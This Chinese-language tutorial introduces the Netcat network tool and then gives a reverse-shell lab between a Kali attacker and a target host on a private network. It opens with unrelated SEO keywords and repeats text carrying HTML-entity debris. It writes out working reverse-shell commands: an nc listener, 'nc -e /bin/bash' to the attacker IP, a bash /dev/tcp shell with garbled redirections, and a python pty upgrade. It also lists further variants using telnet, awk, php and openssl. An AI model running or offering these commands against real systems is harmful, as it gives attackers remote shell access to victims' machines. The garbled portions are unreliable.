网站制作资源,模板网站的域名是什么,电影网页设计与制作教程,虚拟机iis网站建设一, 简介
Netcat#xff08;nc#xff09;是一款网络工具#xff0c;也被称为“瑞士军刀”#xff0c;可以读写TCP或UDP网络连接#xff0c;透过使用TCP或UDP协议的网络连接去读写数据.
它被设计成一个稳定的后门工具#xff0c;能够直接由其它程序和脚本轻松驱动。同时…一, 简介
Netcatnc是一款网络工具也被称为“瑞士军刀”可以读写TCP或UDP网络连接透过使用TCP或UDP协议的网络连接去读写数据.
它被设计成一个稳定的后门工具能够直接由其它程序和脚本轻松驱动。同时它也是一个功能强大的网络调试和探测工具它能够建立你需要的几乎所有类型的网络连接Netcat可以用于端口探测、传输文本信息、传输文件/目录、远程电子取证信息收集、远程控制等常用操作
Netcat在Linux环境下常常是自带的如果你使用的Linux发行版本没有这个工具也可以自行安装比如在CentOS上的安装命令就是 yum install nc -y
二, 反弹shell实验
环境:
攻击端: 192.168.112.1, kali 目标端: 192.168.112.202
由攻击者监听, 从目标端反弹shell给攻击端.
nc反弹shell
攻击端监听 5555 端口:
nc -lvp 5555目标端反弹shell:
方式1:
这行命令的作用是使用 Netcatnc工具在指定的 IP 地址和端口号上创建一个反向 shell。 具体来说它将标准输入和标准输出重定向到指定的 TCP连接上使得远程主机可以通过该连接执行命令并获取输出, 由nc执行bash, 回显给攻击端, 攻击端不显示提示符.
nc -e /bin/bash 192.168.112.1 5555如果要显示带提示符的交互式终端, 可以继续使用python创建虚拟终端:
python -c import pty;pty.spawn(/bin/bash)方式2:
这行命令是一个反向 shell 的命令它将一个 bash shell 连接到指定的 IP 地址和端口号上。 具体来说它将标准输入和标准输出重定向到一个 TCP连接上使得远程主机可以通过该连接执行命令并获取输出, 这种方式执行后, 攻击端会显示提示符.
bash -i /dev/tcp/192.168.112.1/5555 01其他方式
还可以使用 telnet, awk, python, php, java等都可以反弹shell. 加密的反弹shell可以使用openssl和mkfifo加密通道.
